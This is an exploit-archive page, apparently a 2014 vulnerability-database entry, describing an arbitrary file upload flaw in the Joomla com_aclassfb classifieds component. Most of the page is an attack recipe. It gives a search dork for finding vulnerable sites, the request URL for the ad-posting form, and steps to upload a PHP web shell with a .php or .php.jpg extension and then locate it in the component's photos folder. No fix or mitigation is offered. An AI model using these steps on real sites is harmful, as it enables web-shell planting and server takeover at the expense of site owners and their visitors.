Joomla com_aclassfb File Upload Vulnerability

2014.01.11

Credit: DevilScreaM

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264

Dork: inurl:com_aclassfb

#Title : Joomla com_aclassfb File Upload Vulnerability
#Author : DevilScreaM
#Date : 10 January 2014
#Category : Web Applications
#Vendor : http://www.almondsoft.com
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : File Upload
#Dork : inurl:com_aclassfb
File Upload
http://127.0.0.1/index.php?option=com_aclassfb
Exploit :
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
POC :
1. Select Category
2. After Select Category, Click Post New Ad
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
3. Upload Your Shell
extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/
Find Your Shell

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla com_aclassfb File Upload Vulnerability

Dork: inurl:com_aclassfb

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.